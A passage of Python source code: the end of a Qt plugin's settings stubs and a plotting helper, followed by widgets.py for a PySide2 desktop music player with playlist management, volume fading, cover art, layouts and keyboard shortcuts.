# self._widget.State_info.append(x)
def _repaint(self):
self._runscreen.planList.item(self.planListIndex).setHidden(True)
self._runscreen.planList.item(self.planListIndex).setHidden(False)
def shutdown_plugin(self):
# TODO unregister all publishers here
pass
def save_settings(self, plugin_settings, instance_settings):
# TODO save intrinsic configuration, usually using:
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO restore intrinsic configuration, usually using:
# v = instance_settings.value(k)
pass
#def trigger_configuration(self):
# Comment in to signal that the plugin has a way to configure
# This will enable a setting button (gear icon) in each dock widget title bar
# Usually used to open a modal configuration dialog
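# Illustrative sketch (not part of the original plugin): the force/torque and joint-angle
# plots in the state callback above follow a rolling-buffer pattern -- append the newest
# sample, drop the oldest once the window is full, then push the arrays to the curves.
# The helper below restates that pattern generically; the window size and the pyqtgraph
# curve objects are assumptions for the sketch only.
import numpy as np

def update_rolling_plot(x_data, y_data, new_x, new_sample, curves, window=500):
    """Append one sample per channel and trim both buffers to at most `window` points."""
    x_data = np.concatenate((x_data, [new_x]))
    y_data = np.concatenate((y_data, np.asarray(new_sample).reshape(-1, 1)), axis=1)
    if x_data.shape[0] > window:
        x_data = x_data[1:]
        y_data = y_data[..., 1:]
    for i, curve in enumerate(curves):
        curve.setData(x_data, y_data[i, ...])
    return x_data, y_data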
|
widgets.py
|
#
# widgets.py
# Classes for widgets and windows
#
from PySide2 import QtWidgets, QtCore, QtGui, QtMultimedia
import lib
import os
from playlist import PlaylistModel, PlaylistView
import mutagen
from typing import List
import threading
import time
is_admin = lib.getAdminStatus()
if is_admin:
import keyboard
class MainWindow(QtWidgets.QMainWindow):
# - init:
# - Call init on super
# - Set geometry variables from geometry key in config if the key exists, otherwise set them to defaults
# - Set app from QApplication parameter
# - Set player fade rates
# - Call initUI
# - initUI:
# - Set geometry and title
# - Set variable with path to executable to find resources later on
# - Create widgets: buttons for media controls, labels, sliders
# - Initialise player, connect to time and volume sliders
# - Set to paused state
# - Update the duration to 0
# - Initialise playlist
# - Add widgets to layout
# - Create central widget and set layout on central widget
# - Create menus and shortcuts
# - If the player was in the mini layout last launch, switch to the mini layout
# - Set volume from config dictionary, add the media from the config, set the current playlist index from the config, reset lastMediaCount, isTransitioning, isFading, lastVolume and currentLayout variables and reset the metadata
# - Set variables for fade out and in rates
# - Set the minimum size to the current minimum size
# - If the config contains it, load and set the minimum size, otherwise if the layout is set to standard, save the minimum size to the config dictionary and to disk
# - Show
def __init__(self, app: QtWidgets.QApplication):
super().__init__()
if lib.config.__contains__("geometry") and lib.config["geometry"].__contains__("mainWindow"):
geometry = lib.config["geometry"]["mainWindow"]
self.left = geometry["left"]
self.top = geometry["top"]
self.width = geometry["width"]
self.height = geometry["height"]
else:
self.left = lib.defaultLeft
self.top = lib.defaultTop
self.width = lib.defaultWidth
self.height = lib.defaultHeight
if not lib.config.__contains__("geometry"):
lib.config["geometry"] = {}
lib.config["geometry"]["mainWindow"] = {}
lib.config["geometry"]["mainWindow"]["left"] = self.left
lib.config["geometry"]["mainWindow"]["top"] = self.top
lib.config["geometry"]["mainWindow"]["width"] = self.width
lib.config["geometry"]["mainWindow"]["height"] = self.height
self.width_mini = lib.miniWidth
self.height_mini = lib.miniHeight
self.title = lib.progName
self.app = app
self.rate_ms_fadeOut = 200
self.rate_ms_fadeIn = 200
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
self.createWidgets()
self.initPlayer()
self.initPlaylist()
self.init_playpause()
self.connect_update_media()
self.createLayout()
self.createCentralWidget()
self.createMenus()
self.createShortcuts()
self.originalMinimumSize = self.minimumSize()
if lib.config.__contains__("layout"):
self.currentLayout = lib.config["layout"]
self.switchLayout(self.currentLayout)
else:
self.currentLayout = lib.config["layout"] = 0
self.switchLayout(self.currentLayout)
self.setVolume(lib.config["volume"])
self.addMediaFromConfig()
self.setPlaylistIndexFromConfig()
self.lastMediaCount = 0
self.isTransitioning = False
self.isFading = False
self.lastVolume = self.player.volume()
self.metadata = None
if self.currentLayout == 0 and not lib.config.__contains__("mainWindow_minSize"):
self.originalMinimumSize = self.minimumSize()
lib.config["mainWindow_minSize"] = {}
lib.config["mainWindow_minSize"]["w"] = self.originalMinimumSize.width()
lib.config["mainWindow_minSize"]["h"] = self.originalMinimumSize.height()
lib.writeToMainConfigJSON(lib.config)
elif lib.config.__contains__("mainWindow_minSize"):
minSize = lib.config["mainWindow_minSize"]
self.originalMinimumSize = QtCore.QSize(minSize["w"], minSize["h"])
self.show()
def moveEvent(self, event: QtGui.QMoveEvent):
# Set the left and top keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["mainWindow"]["left"] = self.geometry().left()
lib.config["geometry"]["mainWindow"]["top"] = self.geometry().top()
lib.writeToMainConfigJSON(lib.config)
def resizeEvent(self, event: QtGui.QResizeEvent):
# Set the width and height keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["mainWindow"]["width"] = self.geometry().width()
lib.config["geometry"]["mainWindow"]["height"] = self.geometry().height()
lib.writeToMainConfigJSON(lib.config)
def createWidgets(self):
# Create buttons, labels and sliders
self.control_playpause = QtWidgets.QPushButton()
self.control_playpause.setFixedWidth(85)
self.control_previous = QtWidgets.QPushButton(self.tr("Previous"))
self.control_next = QtWidgets.QPushButton(self.tr("Next"))
self.volumeSlider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.volumeSlider.setMaximum(100)
self.volumeSlider.setValue(100)
self.timeSlider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.timePositionLabel = QtWidgets.QLabel(lib.to_hhmmss(0))
self.totalTimeLabel = QtWidgets.QLabel(lib.to_hhmmss(0))
lib.setAltLabelStyle(self.timePositionLabel)
lib.setAltLabelStyle(self.totalTimeLabel)
self.metadata_label = QtWidgets.QLabel()
lib.setAltLabelStyle(self.metadata_label)
self.metadata_label.hide()
self.coverart_label = QtWidgets.QLabel()
self.coverart_label.hide()
self.coverart_width = 64
self.basichelp_label = ClickableLabel("""Welcome to QMusic, to get started go to File --> Open or drag and drop a song or folder into the window""")
self.basichelp_label.setWordWrap(True)
lib.setAltLabelStyle(self.basichelp_label)
self.basichelp_label.hide()
self.basichelp_label.pressed.connect(self.basichelp_label.hide)
# Create playlist and action buttons, connect pressed signals
self.control_playlist_moveDown = QtWidgets.QPushButton(self.tr("Move Down"))
self.control_playlist_moveUp = QtWidgets.QPushButton(self.tr("Move Up"))
self.control_playlist_remove = QtWidgets.QPushButton(self.tr("Remove"))
self.control_playlist_clear = QtWidgets.QPushButton(self.tr("Clear"))
self.control_playlist_moveDown.pressed.connect(self.playlist_moveDown)
self.control_playlist_moveUp.pressed.connect(self.playlist_moveUp)
self.control_playlist_remove.pressed.connect(self.removeMedia)
self.control_playlist_clear.pressed.connect(self.playlist_clear)
self.lyricsView = None
def initPlayer(self):
# Create QMediaPlayer and connect to time and volume sliders value changed members, connect player position/duration changed to update position and duration methods
self.player = QtMultimedia.QMediaPlayer()
self.volumeSlider.valueChanged.connect(self.setVolume)
# Note: self.player.setPosition adds pauses to playback
self.timeSlider.valueChanged.connect(self.setPosition)
self.player.durationChanged.connect(self.update_duration)
self.player.positionChanged.connect(self.update_position)
def setVolume(self, volume: int):
# Set the player volume, set the slider position and update the main config
self.player.setVolume(volume)
self.volumeSlider.setSliderPosition(volume)
lib.updateMainConfig("volume", volume)
def setPosition(self, position: int):
# Get player position and if the new slider position has changed, set the player position
player_position = self.player.position()
if position > player_position + 1 or position < player_position - 1:
self.player.setPosition(position)
# If position is near the end, fade out
duration = self.player.duration()
if not self.isTransitioning and position > duration - 1000:
self.isTransitioning = True
self.fadeOut()
# If transitioning and the new track has started, reset the transitioning state and restore volume
if self.isTransitioning and not self.isFading and position < duration - 1000:
self.fadeIn()
def fadeOut(self):
# Run the fade out on a new thread with the function set as the target for the thread and by calling start
self.fadeThread = threading.Thread(target=self._fadeOut)
self.fadeThread.start()
def _fadeOut(self):
# Record the last volume, then lower the volume by one increment at a time until it reaches 0; exit early if the track has already switched
self.lastVolume = self.player.volume()
volume = self.lastVolume
self.lastTrackIndex = self.playlist.currentIndex()
while volume != 0 and self.playlist.currentIndex() == self.lastTrackIndex:
volume -= 1
self.player.setVolume(volume)
self.isFading = True
time.sleep(1 / self.rate_ms_fadeOut)
# If not fading and the track has changed, instantly restore the volume to prevent volume from staying at 0
if not self.isFading and self.playlist.currentIndex() != self.lastTrackIndex:
self.restoreVolume()
self.isFading = False
def fadeIn(self):
# Run the fade in on a new thread with the function set as the target for the thread and by calling start
self.fadeThread = threading.Thread(target=self._fadeIn)
self.fadeThread.start()
def _fadeIn(self):
# Increase the volume by one increment at a time until it reaches the pre-fade volume, then reset isTransitioning
volume = self.player.volume()
while volume != self.lastVolume:
volume += 1
self.player.setVolume(volume)
self.isFading = True
time.sleep(1 / self.rate_ms_fadeIn)
self.isFading = False
self.isTransitioning = False
def restoreVolume(self):
# Set the player volume to the last recorded volume
self.player.setVolume(self.lastVolume)
def update_duration(self, duration: int):
# Set time slider maximum and set total time label text formatted from argument
self.timeSlider.setMaximum(duration)
self.totalTimeLabel.setText(lib.to_hhmmss(duration))
def update_position(self):
# Set time slider value, refresh labels
position = self.player.position()
self.timeSlider.setValue(position)
self.timePositionLabel.setText(lib.to_hhmmss(position))
def initPlaylist(self):
# Create QMediaPlaylist, connect to player, create and connect playlist model, connect media control pressed signals to playlist methods
self.playlist = QtMultimedia.QMediaPlaylist(self)
self.player.setPlaylist(self.playlist)
self.playlistModel = PlaylistModel(self.playlist)
self.control_previous.pressed.connect(self.previousTrack)
self.control_next.pressed.connect(self.nextTrack)
self.playlist.currentIndexChanged.connect(self.playlistIndexChanged)
# Create the playlist view with the model passed and keep a reference to its selection model (used by the playlist move up/down handlers)
self.playlistView = PlaylistView(self.playlistModel)
self.playlistViewSelectionModel = self.playlistView.selectionModel()
# self.playlistViewSelectionModel.selectionChanged.connect(self.playlist_selection_changed)
# Set view selection mode to abstract item view extended selection and connect double click signal to switch media
self.playlistView.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.playlistView.doubleClicked.connect(self.switchMedia)
# Accept drag and drop
self.setAcceptDrops(True)
def previousTrack(self):
self.playlist.previous()
self.play()
def nextTrack(self):
self.playlist.next()
self.play()
def updatePlayingState(self):
if self.isPlaying():
self.play()
else:
self.pause()
def playlistIndexChanged(self, index: int):
# Save the playlist index to the config
self.savePlaylistIndex(index)
def savePlaylistIndex(self, index: int):
# Write the index to the config dict and proceed to write the dict to the main config JSON
lib.config["playlistCurrentIndex"] = index
lib.writeToMainConfigJSON(lib.config)
def setPlaylistIndexFromConfig(self):
# If the config dict contains the playlist current index, set the playlist current index, otherwise save the playlist index to the config
if lib.config.__contains__("playlistCurrentIndex"):
self.playlist.setCurrentIndex(lib.config["playlistCurrentIndex"])
else:
self.savePlaylistIndex(self.playlist.currentIndex())
# Play and pause to initialise metadata and cover art
self.play()
self.pause()
#
# Revise
#
def playlist_moveDown(self):
# Get selected indexes on the playlist view and save the current playlist index
selectedIndexes = self.playlistView.selectedIndexes()
currentPlaylistIndex = self.playlist.currentIndex()
# If there are selected indexes in the index list, the index list does not contain the current track and the index after (+1) the last selected index is larger than the current index
if len(selectedIndexes) > 0 and self.playlistModel.index(currentPlaylistIndex) not in selectedIndexes and selectedIndexes[-1].row() + 1 > currentPlaylistIndex:
# Get the first and maximum index rows
firstIndex = selectedIndexes[0].row()
maxIndex = selectedIndexes[len(selectedIndexes) - 1].row()
# Get selected media
media = self.getSelectedMedia(firstIndex, maxIndex)
# Set the previous selected indexes
previousSelectedIndexes = self.playlistView.selectedIndexes()
# Insert all of the media in the list two positions after the first selected index, remove the original media instances from the playlist and emit the playlist model layout change signal
self.playlist.insertMedia(firstIndex + 2, media)
self.playlist.removeMedia(firstIndex, maxIndex)
self.playlistModel.layoutChanged.emit()
# On the playlist view selection model, call the select function with the deselect flag to deselect all of the items in the previous selected indexes
len_previousSelectedIndexes = len(previousSelectedIndexes)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(previousSelectedIndexes[0], previousSelectedIndexes[len_previousSelectedIndexes - 1]), QtCore.QItemSelectionModel.Deselect)
# On the playlist view selection model, call the select function with the selection model select parameter to select all of the moved selected indexes (all of the previous selected indexes shifted by 1 over)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(self.playlistModel.index(previousSelectedIndexes[0].row() + 1), self.playlistModel.index(previousSelectedIndexes[len_previousSelectedIndexes - 1].row() + 1)), QtCore.QItemSelectionModel.Select)
def playlist_moveUp(self):
# Get selected indexes on the playlist view and save the current playlist index
selectedIndexes = self.playlistView.selectedIndexes()
currentPlaylistIndex = self.playlist.currentIndex()
# If there are selected indexes in the index list, the index list does not contain the current track and the index before (-1) the last selected index is larger than the current index
if len(selectedIndexes) > 0 and self.playlistModel.index(currentPlaylistIndex) not in selectedIndexes and selectedIndexes[0].row() - 1 > currentPlaylistIndex:
# Get the first and maximum index rows
firstIndex = selectedIndexes[0].row()
maxIndex = selectedIndexes[len(selectedIndexes) - 1].row()
# Get selected media
media = self.getSelectedMedia(firstIndex, maxIndex)
# Set the previous selected indexes
previousSelectedIndexes = self.playlistView.selectedIndexes()
# Insert all of the media in the list one position before the first selected index, remove the original media instances (offset by +1 for first and maximum) from the playlist and emit the playlist model layout change signal
self.playlist.insertMedia(firstIndex - 1, media)
self.playlist.removeMedia(firstIndex + 1, maxIndex + 1)
self.playlistModel.layoutChanged.emit()
# On the playlist view selection model, call the select function with the deselect flag to deselect all of the items in the previous selected indexes
len_previousSelectedIndexes = len(previousSelectedIndexes)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(previousSelectedIndexes[0], previousSelectedIndexes[len_previousSelectedIndexes - 1]), QtCore.QItemSelectionModel.Deselect)
# On the playlist view selection model, call the select function with the selection model select parameter to select all of the moved selected indexes (all of the previous selected indexes shifted by 1 before)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(self.playlistModel.index(previousSelectedIndexes[0].row() - 1), self.playlistModel.index(previousSelectedIndexes[len_previousSelectedIndexes - 1].row() - 1)), QtCore.QItemSelectionModel.Select)
def getSelectedMedia(self, firstIndex: int, maxIndex: int):
# Append the media for each selected row (firstIndex through maxIndex inclusive) from the playlist to a QMediaContent list
media: List[QtMultimedia.QMediaContent] = []
for i in range(firstIndex, maxIndex + 1):
media.append(self.playlist.media(i))
return media
def playlist_clear(self):
# Clear the playlist, clear the media config log and emit the playlist model layout changed signal
self.playlist.clear()
lib.clearConfigFile(lib.configDir, lib.mediaFileName)
self.playlistModel.layoutChanged.emit()
def switchLayout(self, layout: int):
# Switch to the mini layout if the layout is 1 - otherwise switch to the standard layout, and for both add the layout index to the config and write to disk
if layout == 1:
self.switchToMinimalLayout()
self.currentLayout = 1
else:
self.switchToStandardLayout()
self.currentLayout = 0
lib.config["layout"] = self.currentLayout
lib.writeToMainConfigJSON(lib.config)
def toggleLayout(self):
# If the current layout is the standard (0), switch to the mini (1) and vice versa
if self.currentLayout == 0:
self.switchLayout(1)
else:
self.switchLayout(0)
def switchToMinimalLayout(self):
# Hide extra widgets, set the label alignment and set the fixed size to the mini dimensions
self.volumeSlider.hide()
self.coverart_label.hide()
self.control_playlist_moveDown.hide()
self.control_playlist_moveUp.hide()
self.control_playlist_remove.hide()
self.control_playlist_clear.hide()
self.playlistView.hide()
self.metadata_label.setAlignment(QtCore.Qt.AlignCenter)
self.setFixedSize(self.width_mini, self.height_mini)
def switchToStandardLayout(self):
# Show the standard widgets, show the cover art if it was previously displayed [there is media, the coverart pixmap exists and is not a null pixmap], reset the label alignment, set the original maximum and minimum sizes and resize the window
self.volumeSlider.show()
coverart_pixmap = self.coverart_label.pixmap()
if self.playlist.mediaCount() > 0 and coverart_pixmap != None and not coverart_pixmap.isNull():
self.coverart_label.show()
self.control_playlist_moveDown.show()
self.control_playlist_moveUp.show()
self.control_playlist_remove.show()
self.control_playlist_clear.show()
self.playlistView.show()
self.metadata_label.setAlignment(QtCore.Qt.AlignLeft)
self.setMaximumSize(lib.maxWidth, lib.maxHeight)
self.setMinimumSize(self.originalMinimumSize)
self.resize(self.width, self.height)
def playlist_position_changed(self, index: QtCore.QModelIndex):
#
# Not used
#
# Set playlist current index from index
self.playlist.setCurrentIndex(index)
def playlist_selection_changed(self, selection: QtCore.QItemSelection):
#
# Deprecated
#
# If selection indexes are passed, set index to the first row from the index array
if len(selection.indexes()) > 0:
index = selection.indexes()[0].row()
# If index is not negative, (deselection), set playlist view current index to model index from local index
if index > -1:
self.playlistView.setCurrentIndex(self.playlistModel.index(index))
def init_playpause(self):
# Initialise the play/pause button with text/icon and signal connection
self.control_playpause.setText(self.tr("Play"))
self.control_playpause.pressed.connect(self.play)
def pause(self):
# Call the pause method of the player and replace play/pause button properties to play; disconnect, set icon and connect to play method
self.player.pause()
self.control_playpause.pressed.disconnect()
self.control_playpause.setText("Play")
self.control_playpause.pressed.connect(self.play)
def play(self):
# If playlist has media, call the play method of the player and replace play/pause button properties to pause; disconnect, set icon and connect to pause method
if self.playlist.mediaCount() > 0:
self.player.play()
self.control_playpause.pressed.disconnect()
self.control_playpause.setText(self.tr("Pause"))
self.control_playpause.pressed.connect(self.pause)
def playpause(self):
# If playing, pause; otherwise play
if self.isPlaying():
self.pause()
else:
self.play()
#
# Revise
#
def update_metadata(self, media: QtMultimedia.QMediaContent):
# Todo: if no media is playing, hide the metadata, otherwise set the metadata from the metadata class and set the label text
if media.isNull():
self.metadata_label.hide()
else:
mediaPath = lib.urlStringToPath(media.canonicalUrl().toString())
if getattr(self, "metadata_separator", None) == None:
self.metadata_separator = " - "
mutagen_metadata = mutagen.File(mediaPath)
self.metadata = lib.Metadata(mutagen_metadata)
if self.metadata.title and self.metadata.album:
metadata_string = self.metadata.title + self.metadata_separator + self.metadata.album
else:
metadata_string = media.canonicalUrl().fileName()
self.metadata_label.setText(metadata_string)
self.metadata_label.show()
def update_coverart(self, media: QtMultimedia.QMediaContent):
# If no media is playing, hide the cover art, otherwise separate the url string into a path, set the label pixmap and show
if media.isNull():
self.coverart_label.hide()
else:
mediaPath = lib.urlStringToPath(media.canonicalUrl().toString())
coverart_pixmap = lib.get_coverart_pixmap_from_metadata(mutagen.File(mediaPath))
if coverart_pixmap == None:
coverart_path = lib.get_coverart(os.path.dirname(mediaPath))
if coverart_path:
coverart_pixmap = QtGui.QPixmap()
coverart_pixmap.load(coverart_path)
if coverart_pixmap:
self.coverart_label.setPixmap(coverart_pixmap.scaledToWidth(self.coverart_width))
self.coverart_label.show()
else:
self.coverart_label.hide()
# If the player is in the minimal layout mode, re-hide the coverart label
if self.currentLayout == 1:
self.coverart_label.hide()
def update_media(self, media: QtMultimedia.QMediaContent):
# If playing, update the play/pause button to the playing state, otherwise set its properties to the paused state
self.updatePlayingState()
# Called on media change, update track metadata and cover art
self.update_metadata(media)
self.update_coverart(media)
# If the lyrics view has been created, emit the track changed signal
if self.lyricsView != None:
self.lyricsView.trackChanged.emit()
def connect_update_media(self):
# Connect cover art update method to playlist current media changed signal
self.playlist.currentMediaChanged.connect(self.update_media)
def createLayout(self):
# Create main vertical layout, add horizontal layouts with added sub-widgets to vertical layout
detailsGroup = QtWidgets.QGroupBox()
hControlLayout = QtWidgets.QHBoxLayout()
hControlLayout.addWidget(self.control_previous)
hControlLayout.addWidget(self.control_playpause)
hControlLayout.addWidget(self.control_next)
hControlLayout.addWidget(self.volumeSlider)
hTimeLayout = QtWidgets.QHBoxLayout()
hTimeLayout.addWidget(self.timePositionLabel)
hTimeLayout.addWidget(self.timeSlider)
hTimeLayout.addWidget(self.totalTimeLabel)
vDetailsLayout = QtWidgets.QVBoxLayout()
vDetailsLayout.addLayout(hControlLayout)
vDetailsLayout.addLayout(hTimeLayout)
vDetailsLayout.addWidget(self.metadata_label)
hDetailsLayout = QtWidgets.QHBoxLayout()
hDetailsLayout.addLayout(vDetailsLayout)
hDetailsLayout.addWidget(self.coverart_label)
detailsGroup.setLayout(hDetailsLayout)
actionsLayout = QtWidgets.QHBoxLayout()
actionsLayout.addWidget(self.control_playlist_moveDown)
actionsLayout.addWidget(self.control_playlist_moveUp)
actionsLayout.addWidget(self.control_playlist_remove)
actionsLayout.addWidget(self.control_playlist_clear)
self.vLayout = QtWidgets.QVBoxLayout()
self.vLayout.addWidget(detailsGroup)
self.vLayout.addLayout(actionsLayout)
self.vLayout.addWidget(self.playlistView)
self.vLayout.addWidget(self.basichelp_label)
def createCentralWidget(self):
# Create central widget, call set central widget method and set widget layout
self.centralWidget = QtWidgets.QWidget()
self.setCentralWidget(self.centralWidget)
self.centralWidget.setLayout(self.vLayout)
def createMenus(self):
# Create main menu from menuBar method, use addMenu for submenus and add QActions accordingly with triggered connect method, set shortcut from QKeySequence on QActions
self.mainMenu = self.menuBar()
fileMenu = self.mainMenu.addMenu(self.tr("File"))
playerMenu = self.mainMenu.addMenu(self.tr("Player"))
playlistMenu = self.mainMenu.addMenu(self.tr("Playlist"))
helpMenu = self.mainMenu.addMenu(self.tr("Help"))
closeAction = QtWidgets.QAction(self.tr("Close Window"), self)
closeAction.triggered.connect(self.closeWindow)
closeAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+W", "File|Close Window")))
preferencesAction = QtWidgets.QAction(self.tr("Preferences"), self)
preferencesAction.triggered.connect(self.showPreferences)
preferencesAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+,", "File|Preferences")))
openFileAction = QtWidgets.QAction(self.tr("Open File"), self)
openFileAction.triggered.connect(self.open_files)
openFileAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+O", "File|Open")))
openDirAction = QtWidgets.QAction(self.tr("Open Directory"), self)
openDirAction.triggered.connect(self.open_directory)
openDirAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Shift+O", "File|Open Directory")))
switchSizeAction = QtWidgets.QAction(self.tr("Switch Player Size"), self)
switchSizeAction.triggered.connect(self.toggleLayout)
switchSizeAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Shift+S", "Player|Switch Player Size")))
lyricsAction = QtWidgets.QAction(self.tr("Lyrics"), self)
lyricsAction.triggered.connect(self.showLyrics)
lyricsAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+L", "Player|Lyrics")))
playlistRemoveAction = QtWidgets.QAction(self.tr("Remove"), self)
playlistRemoveAction.triggered.connect(self.removeMedia)
playlistClearAction = QtWidgets.QAction(self.tr("Clear"), self)
playlistClearAction.triggered.connect(self.playlist_clear)
playlistClearAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Backspace", "Playlist|Clear")))
basicHelpAction = QtWidgets.QAction(self.tr("Basic Help"), self)
basicHelpAction.triggered.connect(self.showBasicHelp)
helpWindowAction = QtWidgets.QAction(self.tr("Help Window"), self)
helpWindowAction.triggered.connect(self.showHelpWindow)
helpWindowAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Shift+H", "Help|Help Window")))
fileMenu.addAction(closeAction)
fileMenu.addAction(preferencesAction)
fileMenu.addAction(openFileAction)
fileMenu.addAction(openDirAction)
playerMenu.addAction(switchSizeAction)
playerMenu.addAction(lyricsAction)
playlistMenu.addAction(playlistRemoveAction)
playlistMenu.addAction(playlistClearAction)
helpMenu.addAction(basicHelpAction)
helpMenu.addAction(helpWindowAction)
def closeWindow(self):
# Get the active window from the QApplication, quit the application if the active window is the player, otherwise hide and then destroy that window
activeWindow = self.app.activeWindow()
if activeWindow == self:
self.app.quit()
else:
# Note: the widget must be hidden before destruction, otherwise a segmentation fault can occur when quitting the application
activeWindow.hide()
activeWindow.destroy()
def showPreferences(self):
# Create instance of preferences widget with the QApplication given as a parameter
self.preferencesView = Preferences(self.app, self)
def showLyrics(self):
# Create instance of lyrics widget
self.lyricsView = LyricsWidget(self)
def showHelpWindow(self):
# Create instance of help widget
self.helpView = HelpWidget(self)
def showBasicHelp(self):
# Show the label
self.basichelp_label.show()
def open_files(self):
# Set last media count for playlist media check later on
self.lastMediaCount = self.playlist.mediaCount()
# Set paths from QFileDialog getOpenFileNames, filetypes formatted as "Name (*.extension);;Name" etc.
paths, _ = QtWidgets.QFileDialog.getOpenFileNames(self, self.tr("Open File"), "", self.tr("All Files (*.*);;Waveform Audio (*.wav);;mp3 Audio (*.mp3)"))
# For each path, add media QMediaContent from local file to playlist if the filetype is supported
if paths:
for path in paths:
if self.isSupportedFileFormat(path):
self.addMediaFromFile(path)
# Emit playlist model layout change and play if paused
self.playlistModel.layoutChanged.emit()
# Check new media and play if conditions are met
self.playNewMedia()
# Write media to config
self.writeMediaToConfig()
def isSupportedFileFormat(self, path: str) -> bool:
# Split the path by the extension separator and if the list of supported formats contains the last element of the list, return true
split = path.split(os.path.extsep)
if lib.supportedFormats.__contains__(split[len(split)-1]):
return True
else:
return False
def open_directory(self):
# Set last media count for playlist media check later on
self.lastMediaCount = self.playlist.mediaCount()
# Set directory from QFileDialog getExistingDirectory
dirPath = QtWidgets.QFileDialog.getExistingDirectory(self, self.tr("Open Folder"), "")
# If a path was returned, get a directory listing, sort it and for every file in the list get the full path: if the format is supported, add the media to the playlist
if dirPath:
dirList = os.listdir(dirPath)
dirList.sort()
for fname in dirList:
path = os.path.join(dirPath, fname)
if self.isSupportedFileFormat(path):
self.addMediaFromFile(path)
# Emit playlist model layout change and play if paused
self.playlistModel.layoutChanged.emit()
# Check new media and play if conditions are met
self.playNewMedia()
# Write media to config
self.writeMediaToConfig()
def addMediaFromFile(self, path: str):
# Add the media to the playlist with a QMediaContent instance from the local file
self.playlist.addMedia(
QtMultimedia.QMediaContent(QtCore.QUrl.fromLocalFile(path))
)
def addMediaFromConfig(self):
# If the file exists, read in each line of the media log to a list and add the media content from each path to the playlist
paths: List[str] = []
mediaLog = os.path.join(lib.configDir, lib.mediaFileName)
if os.path.isfile(mediaLog):
with open(mediaLog, "r") as mediaData:
paths = mediaData.read().split("\n")
for path in paths:
if path != "":
self.addMediaFromFile(path)
# Emit the playlist model layout changed signal
self.playlistModel.layoutChanged.emit()
def writeMediaToConfig(self):
# Add path from canonical url string of each media item in the playlist to a list and write it to the config
paths: List[str] = []
for i in range(self.playlist.mediaCount()):
urlString = self.playlist.media(i).canonicalUrl().toString()
paths.append(lib.urlStringToPath(urlString))
lib.writeToConfig(lib.configDir, lib.mediaFileName, paths)
def isPlaying(self) -> bool:
if self.player.state() == QtMultimedia.QMediaPlayer.PlayingState:
return True
else:
return False
#
# Revise
#
def removeMedia(self):
# Get the selected indexes from the playlist view and if there are indexes selected, remove the corresponding media from the playlist and emit the playlist model layout change signal
selectedIndexes: List[QtCore.QModelIndex] = self.playlistView.selectedIndexes()
if len(selectedIndexes) > 0:
firstIndex = selectedIndexes[0]
lastIndex = selectedIndexes[len(selectedIndexes)-1]
self.playlist.removeMedia(firstIndex.row(), lastIndex.row())
self.playlistModel.layoutChanged.emit()
def createShortcuts(self):
# Create QShortcuts from QKeySequences with the shortcut and menu item passed as arguments
shortcut_playpause_space = QtWidgets.QShortcut(QtGui.QKeySequence(self.tr("Space")), self)
shortcut_playpause = QtWidgets.QShortcut(QtGui.QKeySequence(QtCore.Qt.Key_MediaPlay), self)
shortcut_playpause_space.activated.connect(self.playpause)
shortcut_playpause.activated.connect(self.playpause)
shortcut_delete = QtWidgets.QShortcut(QtGui.QKeySequence(self.tr("Backspace")), self)
shortcut_delete.activated.connect(self.removeMedia)
shortcut_previous = QtWidgets.QShortcut(QtGui.QKeySequence(QtCore.Qt.Key_MediaLast), self)
shortcut_previous.activated.connect(self.playlist.previous)
shortcut_next = QtWidgets.QShortcut(QtGui.QKeySequence(QtCore.Qt.Key_MediaNext), self)
shortcut_next.activated.connect(self.playlist.next)
if is_admin:
keyboard.add_hotkey(0x83, self.playpause)
#
# Revise
#
# Synopsis of drag and drop:
# - Set accept drops to true
# dragEnterEvent (QDragEnterEvent):
# - Call event accept proposed action method if event mime data has urls
# dropEvent (QDropEvent):
# - Set last media count
# - If a url is a directory, append paths from os.listdir of supported files to a list
# - Sort the list and add urls from the paths
# - Add media to playlist from urls
# - Emit model layout change
# - Call playNewMedia:
# - If not playing and last media count was 0, play
# - Write media to config
#
def dragEnterEvent(self, event: QtGui.QDragEnterEvent):
if event.mimeData().hasUrls():
event.acceptProposedAction()
def dropEvent(self, event: QtGui.QDropEvent):
self.lastMediaCount = self.playlist.mediaCount()
for url in event.mimeData().urls():
path = lib.urlStringToPath(url.toString())
if os.path.isdir(path):
paths: List[str] = []
for fname in os.listdir(path):
split = fname.split(os.path.extsep)
if lib.supportedFormats.__contains__(split[len(split)-1]):
paths.append(os.path.join(path, fname))
if paths:
paths.sort()
for path in paths:
self.playlist.addMedia(
QtMultimedia.QMediaContent(QtCore.QUrl.fromLocalFile(path))
)
else:
split = url.toString().split(os.path.extsep)
if lib.supportedFormats.__contains__(split[len(split)-1]):
self.playlist.addMedia(
QtMultimedia.QMediaContent(url)
)
self.playlistModel.layoutChanged.emit()
self.playNewMedia()
self.writeMediaToConfig()
def playNewMedia(self):
# Play if not already playing and the playlist was empty before the new media was added (last media count was 0)
if self.isPlaying() == False and self.lastMediaCount == 0:
self.play()
def switchMedia(self):
# Get selected indexes from playlist view, if there are indexes selected, set the new current playlist index and play the new media
selectedIndexes = self.playlistView.selectedIndexes()
if len(selectedIndexes) > 0:
self.playlist.setCurrentIndex(selectedIndexes[0].row())
self.playNewMedia()
#
#
# Revise
#
#
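# Illustrative sketch (assumption, not the player's own API): the fadeOut/fadeIn methods
# above ramp the QMediaPlayer volume on a worker thread so playback transitions do not
# block the UI. The generic helper below shows the same ramp; the step interval is a
# hypothetical value chosen for the sketch.
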